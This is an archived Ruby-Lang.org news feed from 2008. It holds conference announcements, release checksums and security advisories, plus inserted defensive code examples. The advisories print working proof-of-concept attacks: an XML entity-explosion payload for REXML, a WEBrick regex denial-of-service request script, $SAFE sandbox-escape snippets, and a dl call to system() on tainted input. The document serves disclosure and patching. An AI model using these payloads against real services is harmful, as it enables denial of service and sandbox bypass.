The latest news from Ruby-Lang.org.
Published on 2008-11-10 22:55:53
Scotland on Rails is pleased to announce that Conference2009 will be held March 26-28 in Edinburgh, Scotland.
We are now accepting submissions. The closing date for submissions is December 1st 2008, so there’s still time! Please mail your plaintext proposals for 45 minute sessions to submissions@scotlandonrails.com.
Alternatively, if you are interested in sponsoring the conference, please mail sponsorship@scotlandonrails.com for a prospectus.
Lastly, if you wish to be notified when we open for registration, you can sign up on the site.
Come and enjoy all that Edinburgh has to offer (whisky! castle! volcano! ruby! whisky!) in March. We hope to see you there.

Published on 2008-11-8 23:03:32
MountainWest RubyConf 2009 will be held March 13-14, 2009, in Salt Lake City, Utah, USA.
Proposals to speak at this regional conference are now being accepted. Please send your proposal to proposals@mtnwestrubyconf.org.
The submission deadline is midnight (MST) on December 31st, 2008.
There are sponsorship opportunities available as well. Please contact sponsorship@mtnwestruby.org if you are interested.
Please see mtnwestrubyconf.org/ for more details as they become available.

Published on 2008-10-29 3:45:27
Yugui (Yuki Sonoda) announced the release of Ruby 1.9.1-preview 1:
This is a preview release of Ruby 1.9.1, which will be the first stable version of the Ruby 1.9 series. Try it out now and get an early taste of a modern, faster, multilingualized, and much improved Ruby with clearer syntax.
If you encounter any bugs or problems, please let us know via the official issue tracking system:
You can download the release from:
- ftp://ftp.ruby-lang.org/pub/ruby/1.9/ruby-1.9.1-preview1.tar.bz2
  SIZE: 6169022 bytes MD5: 0d51dc949bb6b438ad4ebfabbb5f6754 SHA256: dc39000537d7c7528ef26af8e1c3a6215b30b6c579c615eaec7013513410456a
- ftp://ftp.ruby-lang.org/pub/ruby/1.9/ruby-1.9.1-preview1.tar.gz
  SIZE: 7409682 bytes MD5: 738f701532452fd5d36f5c155f3ba692 SHA256: 99443bdae9f94ba7b08de187881f8cbee172379edf9c5fa85fc04c869150ff6d
- ftp://ftp.ruby-lang.org/pub/ruby/1.9/ruby-1.9.1-preview1.zip
  SIZE: 8569116 bytes MD5: 5f68246246c4cd29d8a3b6b34b29b6ac SHA256: a6c3a7bf7ea83b595024764926353e08596a78e40c57ac58c568662e5e88df95

Published on 2008-10-3 7:21:06
RubyConf 2008 is sold out
However, there is a waiting list you can join in case of cancellations.

Published on 2008-9-9 10:49:37
Pearson Education is running a Voices That Matter Ruby conference this fall in Boston. The conference, from the same people who bring you Addison-Wesley's Professional Ruby Series, will give you a chance to meet and learn from those very same authors. Don't miss a chance to interact with so many Ruby professionals.

Published on 2008-8-23 15:56:11
There is a DoS vulnerability in the REXML library included in the Ruby Standard Library. A so-called "XML entity explosion" attack technique can be used to remotely bring down (disable) any application that parses user-provided XML with REXML.
Most Rails applications will be vulnerable because Rails parses user-provided XML using REXML by default.
Impact
An attacker can cause a denial of service by causing REXML to parse a document containing recursively nested entities such as:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE member [
  <!ENTITY a "&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;">
  <!ENTITY b "&c;&c;&c;&c;&c;&c;&c;&c;&c;&c;">
  <!ENTITY c "&d;&d;&d;&d;&d;&d;&d;&d;&d;&d;">
  <!ENTITY d "&e;&e;&e;&e;&e;&e;&e;&e;&e;&e;">
  <!ENTITY e "&f;&f;&f;&f;&f;&f;&f;&f;&f;&f;">
  <!ENTITY f "&g;&g;&g;&g;&g;&g;&g;&g;&g;&g;">
  <!ENTITY g "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx">
]>
<member>
&a;
</member>
Vulnerable versions
1.8 series
- 1.8.6-p287 and all prior versions
- 1.8.7-p72 and all prior versions
1.9 series
- all versions
Solution
Please download the following monkey patch to fix this problem.
Then fix your application to load rexml-expansion-fix2.rb before using REXML.
require "rexml-expansion-fix2"
...
doc = REXML::Document.new(str)
...
If you have a Rails application, copy rexml-expansion-fix2.rb into a directory on the load path (such as RAILS_ROOT/lib/), and put the following line into config/environment.rb.
require "rexml-expansion-fix2"
If your application is Rails 2.1 or later, you can simply copy rexml-expansion-fix2.rb to RAILS_ROOT/config/initializers and it will be required automatically.
By default, the XML entity expansion limit is 10000. You can change it by setting REXML::Document.entity_expansion_limit, e.g.
REXML::Document.entity_expansion_limit = 1000
This fix will be made available as a gem and used by future versions of Rails, but users should take corrective action immediately.
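The following is an added example (not the advisory's monkey patch and not REXML's own code) showing how the expansion limit described above behaves in practice: untrusted XML is parsed with a deliberately low limit, the document text is read inside the rescue because REXML expands entities lazily when text is accessed, and a document that blows past the limit is rejected instead of consuming memory. The limit of 100, the helper names, and the shortened four-level variant of the advisory's nested-entity document are this example's own choices; the REXML::Security.entity_expansion_limit setter used on newer REXML releases is an assumption, with the advisory's REXML::Document.entity_expansion_limit kept as the fallback.

```ruby
require 'rexml/document'

# Cap the number of entity expansions REXML performs per document.
# Newer REXML releases expose the knob as REXML::Security.entity_expansion_limit
# (assumed); the advisory's REXML::Document.entity_expansion_limit is the fallback.
def set_entity_expansion_limit(n)
  if defined?(REXML::Security) && REXML::Security.respond_to?(:entity_expansion_limit=)
    REXML::Security.entity_expansion_limit = n
  else
    REXML::Document.entity_expansion_limit = n
  end
end

# Parse untrusted XML and return [:ok, root_text] or [:rejected, reason].
# Entity references are expanded when the text is read, so the read is
# inside the method body that the rescue clauses cover.
def parse_untrusted_xml(xml, limit: 100)
  set_entity_expansion_limit(limit)
  doc = REXML::Document.new(xml)
  [:ok, doc.root.text]
rescue REXML::ParseException => e
  [:rejected, "malformed: #{e.message.lines.first.strip}"]
rescue RuntimeError => e
  # REXML raises a RuntimeError when either the expansion count or the
  # expanded text size exceeds its configured limit.
  [:rejected, "entity expansion refused: #{e.message}"]
end

# Constructed benign input.
BENIGN_XML = '<?xml version="1.0"?><member>hello</member>'

# Shortened form of the advisory's nested-entity document: four levels
# (10^3 expansions of a 30-byte entity) instead of seven.
EXPLOSIVE_XML = <<~XML
  <?xml version="1.0" encoding="UTF-8"?>
  <!DOCTYPE member [
    <!ENTITY a "&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;">
    <!ENTITY b "&c;&c;&c;&c;&c;&c;&c;&c;&c;&c;">
    <!ENTITY c "&d;&d;&d;&d;&d;&d;&d;&d;&d;&d;">
    <!ENTITY d "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx">
  ]>
  <member>&a;</member>
XML

if __FILE__ == $0
  p parse_untrusted_xml(BENIGN_XML)     # [:ok, "hello"]
  p parse_untrusted_xml(EXPLOSIVE_XML)  # [:rejected, "entity expansion refused: ..."]
end
```

The limit is a per-process global in REXML, so set it once at application start rather than per request; the low value here only makes the rejection visible with a small document. Note that Document.new alone does not trigger the expansion: the cost is paid when text or attribute values are read, which is why a parser-level guard is the right place for the limit.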
Credit
Credit to Luka Treiber and Mitja Kolsek of ACROS Security for disclosing the problem to Ruby and Rails Security Teams.
Credit to Michael Koziarski of Rails Core Team for creating the monkey patch to fix the vulnerability.
Changes
- 2008-08-29 18:46 +09:00 fixed the summary not to mislead that this vulnerability is Rails specific.
- 2008-11-09 12:40 +09:00 fixed a bug of the monkey patch.

Published on 2008-8-11 10:01:00
Ruby 1.8.7-p72 and 1.8.6-p287 have been released. The previous releases were incomplete; the new releases include fixes for the previously announced vulnerability in dl.
The released source archives are available at:
- <URL:ftp://ftp.ruby-lang.org/pub/ruby/1.8/ruby-1.8.6-p287.tar.gz>
- <URL:ftp://ftp.ruby-lang.org/pub/ruby/1.8/ruby-1.8.6-p287.tar.bz2>
- <URL:ftp://ftp.ruby-lang.org/pub/ruby/1.8/ruby-1.8.6-p287.zip>
- <URL:ftp://ftp.ruby-lang.org/pub/ruby/1.8/ruby-1.8.7-p72.tar.gz>
- <URL:ftp://ftp.ruby-lang.org/pub/ruby/1.8/ruby-1.8.7-p72.tar.bz2>
- <URL:ftp://ftp.ruby-lang.org/pub/ruby/1.8/ruby-1.8.7-p72.zip>
Checksums:
MD5(ruby-1.8.6-p287.tar.gz)= f6cd51001534ced5375339707a757556
SHA256(ruby-1.8.6-p287.tar.gz)= 6463d1932c34ff72b79174ac7d2c28940d29d147928250928a00a0dbee43db57
SIZE(ruby-1.8.6-p287.tar.gz)= 4590393
MD5(ruby-1.8.6-p287.tar.bz2)= 80b5f3db12531d36e6c81fac6d05dda9
SHA256(ruby-1.8.6-p287.tar.bz2)= ac15a1cb78c50ec9cc7e831616a143586bdd566bc865c6b769a0c47b3b3936ce
SIZE(ruby-1.8.6-p287.tar.bz2)= 3956902
MD5(ruby-1.8.6-p287.zip)= e555d51f5b387fdd52ae53d9bafa13f5
SHA256(ruby-1.8.6-p287.zip)= 844c66c015565839531a34b83e0526cd4fa2a71cc0f5cc8ddb0d4c158403543a
SIZE(ruby-1.8.6-p287.zip)= 5606238
MD5(ruby-1.8.7-p72.tar.gz)= 5e5b7189674b3a7f69401284f6a7a36d
SHA256(ruby-1.8.7-p72.tar.gz)= e15ca005076f5d6f91fc856fdfbd071698a4cadac3c6e25855899dba1f6fc5ef
SIZE(ruby-1.8.7-p72.tar.gz)= 4805594
MD5(ruby-1.8.7-p72.tar.bz2)= 0b215c46b89b28d7ab8d56d96e72d5b9
SHA256(ruby-1.8.7-p72.tar.bz2)= a8f8a28e286dd76747d8e97ea5cfe7a315eb896906ab8c8606d687d9f6f6146e
SIZE(ruby-1.8.7-p72.tar.bz2)= 4127450
MD5(ruby-1.8.7-p72.zip)= b44fe5a12d4bf138ba0d3660e13a8216
SHA256(ruby-1.8.7-p72.zip)= 77e67be4aa8c3e041e1d20d24e5fcf2e33ad9bccb3da3332b6c0a5b648334903
SIZE(ruby-1.8.7-p72.zip)= 5855902
For a full list of all changes, see the bundled files named ChangeLog, which are also available at the following locations:

Published on 2008-8-8 10:59:49
Multiple vulnerabilities have been discovered in Ruby. It's recommended that you upgrade to the latest versions.
Details
The following vulnerabilities have been discovered.
Several vulnerabilities in safe level
Several vulnerabilities in safe level have been discovered.
untrace_var is permitted at safe level 4.
trace_var(:$VAR) {|val| puts "$VAR = #{val}" }
Thread.new do
  $SAFE = 4
  eval %q{
    proc = untrace_var :$VAR
    proc.first.call("aaa")
  }
end.join
$PROGRAM_NAME may be modified at safe level 4.
Thread.new do
  $SAFE = 4
  eval %q{$PROGRAM_NAME.replace "Hello, World!"}
end.join
$PROGRAM_NAME #=> "Hello, World!"
Insecure methods may be called at safe level 1-3.
class Hello
  def world
    Thread.new do
      $SAFE = 4
      msg = "Hello, World!"
      def msg.size
        self.replace self*10 # replace string
        1 # return wrong size
      end
      msg
    end.value
  end
end
$SAFE = 1 # or 2, or 3
s = Hello.new.world
if s.kind_of?(String)
  puts s if s.size < 20 # print string which size is less than 20
end
Syslog operations are permitted at safe level 4.
require "syslog"
Syslog.open
Thread.new do
  $SAFE = 4
  eval %q{
    Syslog.log(Syslog::LOG_WARNING, "Hello, World!")
    Syslog.mask = Syslog::LOG_UPTO(Syslog::LOG_EMERG)
    Syslog.info("masked")
    Syslog.close
  }
end.join
These vulnerabilities were reported by Keita Yamaguchi.
DoS vulnerability in WEBrick
WEBrick::HTTP::DefaultFileHandler can be made to take exponential time on certain requests because of a backtracking regular expression in WEBrick::HTTPUtils.split_header_value.
Exploitable server:
require 'webrick'
WEBrick::HTTPServer.new(:Port => 2000, :DocumentRoot => "/etc").start
Attack:
require 'net/http'
res = Net::HTTP.start("localhost", 2000) { |http|
  req = Net::HTTP::Get.new("/passwd")
  req['If-None-Match'] = %q{meh=""} + %q{foo="bar" } * 100
  http.request(req)
}
p res
The request likely won't finish in this universe.
This vulnerability was reported by Christian Neukirchen.
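The advisory attributes the hang to a backtracking regular expression used to split a comma-separated header value. As an added example (not WEBrick's code and not the fix that shipped), the splitter below does the same job with a hand-written single pass over the bytes, so its running time is linear in the header length whatever the input looks like. The function name and the sample inputs are this example's own; the pathological input is built exactly as the advisory's attack header is.

```ruby
# Split a comma-separated header value (e.g. If-None-Match) into its
# elements, honouring double-quoted strings and backslash escapes inside
# them, in one linear pass. Every character is examined exactly once, so
# there is no backtracking for a crafted input to exploit.
def split_header_value_linear(str)
  values = []
  current = +""
  in_quotes = false
  escaped = false
  str.each_char do |ch|
    if escaped
      current << ch          # character after a backslash inside quotes
      escaped = false
    elsif in_quotes && ch == "\\"
      current << ch
      escaped = true
    elsif ch == '"'
      in_quotes = !in_quotes # quotes toggle; commas inside them are literal
      current << ch
    elsif ch == "," && !in_quotes
      values << current.strip
      current = +""
    else
      current << ch
    end
  end
  values << current.strip
  values.reject(&:empty?)
end

# Constructed inputs: a well-formed If-None-Match value and the
# pathological header from the advisory (no commas, 100 quoted pairs).
NORMAL_ETAGS = 'W/"abc", "d,ef", xyz'
PATHOLOGICAL_HEADER = %q{meh=""} + %q{foo="bar" } * 100

if __FILE__ == $0
  p split_header_value_linear(NORMAL_ETAGS)         # ["W/\"abc\"", "\"d,ef\"", "xyz"]
  p split_header_value_linear(PATHOLOGICAL_HEADER).size  # 1
end
```

Where a regular expression has to stay in the request path, a timing test with inputs like PATHOLOGICAL_HEADER scaled up (100, 200, 400 repetitions) exposes super-linear behaviour before deployment; on Ruby 3.2 and later, Regexp.timeout= additionally bounds how long any single match may run.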
Lack of taintness check in dl
dl doesn't check taintness, so it could allow attackers to call dangerous functions.
require 'dl'
$SAFE = 1
h = DL.dlopen(nil)
sys = h.sym('system', 'IP')
uname = 'uname -rs'.taint
sys[uname]
This vulnerability was reported by sheepman.
DNS spoofing vulnerability in resolv.rb
resolv.rb allows remote attackers to spoof DNS answers. The risk is reduced by randomizing DNS transaction IDs and source ports, so resolv.rb has been fixed to randomize both.
- see also: CVE-2008-1447
This vulnerability was reported by Tanaka Akira.
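To make the mitigation concrete, here is an added example (not resolv.rb's code) of the two checks a stub resolver relies on: the transaction ID of each query is drawn from SecureRandom instead of a counter, and a reply is accepted only when it is flagged as a response, carries the ID of the outstanding query, and repeats that query's question. All function names, the constructed query for example.com, and the forged replies used to exercise the check are this example's own. Source-port randomization, the other half of the fix, is obtained by binding the UDP socket to port 0 so the OS picks an ephemeral port; it is described in the comments but no socket is opened here.

```ruby
require 'securerandom'

# Build a minimal DNS query for an A record. The 16-bit transaction ID is
# drawn from SecureRandom rather than a sequential counter. Returns
# [id, wire_bytes]. (In a real resolver the socket carrying this query
# would be bound to port 0 so that the source port is unpredictable too.)
def build_dns_query(name)
  id = SecureRandom.random_number(0x10000)
  header = [id, 0x0100, 1, 0, 0, 0].pack("n6")   # flags: RD=1; QDCOUNT=1
  qname = name.split(".").map { |label| [label.bytesize, label].pack("Ca*") }.join
  question = qname + "\x00".b + [1, 1].pack("nn") # root label, QTYPE=A, QCLASS=IN
  [id, header + question]
end

# Decode the header and the first question of a DNS message. Questions we
# built ourselves never use name compression, so plain labels suffice.
def parse_dns(msg)
  id, flags, qdcount = msg.unpack("nnn")
  labels = []
  offset = 12
  loop do
    len = msg.getbyte(offset)
    offset += 1
    break if len.nil? || len.zero?
    labels << msg.byteslice(offset, len)
    offset += len
  end
  qtype, qclass = msg.byteslice(offset, 4).unpack("nn")
  { id: id, is_response: (flags & 0x8000) != 0, qdcount: qdcount,
    qname: labels.join("."), qtype: qtype, qclass: qclass }
end

# Accept a reply only if it is a response, matches the outstanding query's
# transaction ID, and echoes the same question. With a random ID (and a
# random source port) a spoofer has to guess both to get a forged answer past
# this check.
def response_matches?(query_msg, response_msg)
  q = parse_dns(query_msg)
  r = parse_dns(response_msg)
  r[:is_response] && r[:id] == q[:id] && r[:qdcount] == 1 &&
    r[:qname].casecmp?(q[:qname]) && r[:qtype] == q[:qtype] && r[:qclass] == q[:qclass]
end

# Constructed reply for testing: copy the query, set the QR bit, and
# optionally substitute a different transaction ID (a spoofer's guess).
def fake_response(query_msg, id: nil)
  fields = query_msg.byteslice(0, 12).unpack("n6")
  fields[0] = id unless id.nil?
  fields[1] |= 0x8000
  fields.pack("n6") + query_msg.byteslice(12, query_msg.bytesize - 12)
end

# Fraction of n freshly generated IDs that are distinct. A counter would
# give predictable IDs; random draws from 2^16 values collide only rarely.
def distinct_id_ratio(n = 2000)
  ids = Array.new(n) { build_dns_query("example.com").first }
  ids.uniq.size.to_f / n
end

if __FILE__ == $0
  id, query = build_dns_query("example.com")
  puts "query id: #{id}"
  puts "genuine reply accepted: #{response_matches?(query, fake_response(query))}"
  puts "wrong-id reply accepted: #{response_matches?(query, fake_response(query, id: (id + 1) & 0xFFFF))}"
end
```

The ID check alone gives only 16 bits of unpredictability, which is why the advisory pairs it with source-port randomization: a forged reply must also arrive at the right ephemeral port, and the kernel discards the rest before the resolver ever sees them.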
Vulnerable versions
- 1.8 series
  - 1.8.5 and all prior versions
  - 1.8.6-p286 and all prior versions
  - 1.8.7-p71 and all prior versions
- 1.9 series
  - r18423 and all prior revisions
Solution
- 1.8 series
  - Please upgrade to 1.8.6-p287, or 1.8.7-p72.
- 1.9 series
  - Please check out the latest version using Subversion.
$ svn co http://svn.ruby-lang.org/repos/ruby/trunk ruby
Please note that a package that corrects this weakness may already be available through your package management software.
Credit
Credit to Keita Yamaguchi, Christian Neukirchen, sheepman, and Tanaka Akira for disclosing these problems to Ruby Security Team.
Changes
- 2008-08-08 12:21 +09:00 fixed the revision number of ruby 1.9.
- 2008-08-11 11:23 +09:00 fixed the patchlevel of ruby 1.8. see the release announcement of Ruby 1.8.7-p72 and 1.8.6-p287

Published on 2008-8-5 4:26:29
RubyConf 2008 will be held in Orlando, Florida, USA, from November 6 to November 8.
Proposals for presentations are now being accepted. All proposals must be received by August 21.

Published on 2008-6-20 20:54:43
Multiple vulnerabilities in Ruby may lead to a denial of service (DoS) condition or allow execution of arbitrary code.
Impact
Through these vulnerabilities, an attacker can cause a denial of service condition or execute arbitrary code.
Vulnerable versions
- 1.8 series
  - 1.8.4 and all prior versions
  - 1.8.5-p230 and all prior versions
  - 1.8.6-p229 and all prior versions
  - 1.8.7-p21 and all prior versions
- 1.9 series
  - 1.9.0-1 and all prior versions
Solution
- 1.8 series
  - Please upgrade to 1.8.5-p231, or 1.8.6-p230, or 1.8.7-p22.
    - <URL:ftp://ftp.ruby-lang.org/pub/ruby/1.8/ruby-1.8.5-p231.tar.gz> (md5sum: e900cf225d55414bffe878f00a85807c)
    - <URL:ftp://ftp.ruby-lang.org/pub/ruby/1.8/ruby-1.8.6-p230.tar.gz> (md5sum: 5e8247e39be2dc3c1a755579c340857f)
    - <URL:ftp://ftp.ruby-lang.org/pub/ruby/1.8/ruby-1.8.7-p22.tar.gz> (md5sum: fc3ede83a98f48d8cb6de2145f680ef2)
- 1.9 series
  - Please upgrade to 1.9.0-2.
    - <URL:ftp://ftp.ruby-lang.org/pub/ruby/1.9/ruby-1.9.0-2.tar.gz> (md5sum: 2a848b81ed1d6393b88eec8aa6173b75)
These versions also fix the vulnerability of WEBrick (CVE-2008-1891).
Please note that a package that corrects this weakness may already be available through your package management software.
Credit
Credit to Drew Yao of Apple Product Security for disclosing the problem to Ruby Security Team.
Changes
- 2008-06-21 00:29 +09:00 removed wrong CVE IDs (CVE-2008-2727, CVE-2008-2728).
